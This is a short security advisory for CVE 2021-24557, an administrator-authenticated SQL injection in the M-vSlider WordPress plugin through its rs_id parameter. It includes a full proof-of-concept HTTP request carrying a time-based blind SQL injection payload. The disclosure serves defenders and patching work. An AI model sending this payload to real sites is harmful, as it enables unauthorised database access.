M-vSlider <= 2.1.3 – Authenticated (admin+) SQL Injection | CVE 2021-24557

Description

The update functionality in the rslider_page uses an rs_id POST parameter which is not validated, sanitised or escaped before being inserted in sql query, therefore leading to SQL injection for users having Administrator role.

Proof of Concept

POST /wp-admin/admin.php?page=rslider_page&updated=true HTTP/1.1
Host: 172.28.128.50
Content-Length: 424
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.28.128.50
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.28.128.50/wp-admin/admin.php?page=rslider_page
Accept-Language: en-US,en;q=0.9
Cookie: [admin cookies]
Connection: close

tcOptions=process&rs_id=2%20AND%20(SELECT%209727%20FROM%20(SELECT(SLEEP(5)))KZOZ)&rs_name=asd&rs_width=250&rs_height=250&rs_animstyle=fade&rs_slices=15&rs_boxCols=8&rs_boxRows=4&rs_theme=bar&rs_type=sequence&rs_speed=1300&rs_timeout=5&rs_css=margin%3A+0px+0px+0px+0px%3Bpadding%3A+0%3Bborder%3A+none%3B&rs_img0=&rs_lnk0=&rs_cap0=&rs_img1=&rs_lnk1=&rs_cap1=&rs_img2=&rs_lnk2=&rs_cap2=&rs_img3=&rs_lnk3=&rs_cap3=&rs_img4=&rs_lnk4=&rs_cap4=&rs_totalimgs=5&save=Save+Settings